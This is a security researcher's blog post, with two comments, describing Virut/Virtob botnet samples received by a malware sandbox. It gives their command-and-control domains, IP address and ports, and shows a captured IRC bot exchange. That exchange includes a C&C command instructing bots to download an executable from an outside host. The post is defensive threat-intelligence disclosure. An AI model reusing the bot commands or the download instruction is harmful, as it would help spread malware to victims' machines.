Annoying Botnets

At cwsandbox.org, we receive quite a few binaries these days. However, we receive also lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware sample we receive a lot are all the bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of sample of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider did not yet react to abuse complaints, thus I publish a few more details about this botnet - perhaps someone else can help. The botnet related to the first domains has the Command & Control server listening on TCP port 65520, while the second botnet has the C&C server at TCP port 80. An example communication of the bots looks like:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe

Trackbacks

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

  1. Anonymous says:

    AFAIK "JOIN &virtu" is specific for Virut/Virtob, not allaple.

  2. Thorsten Holz says:

    Yes, you are completely right!
    The wording of the blog entry is presumably a bit misleading: We receive quite a lot of Allaple submissions which we filter out in an automated way. In addition, we also receive quite a lot Virut / Virtob samples which contact the two domains mentioned in the entry. Thus these are two different malware families.


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

 
Submitted comments will be subject to moderation before being displayed.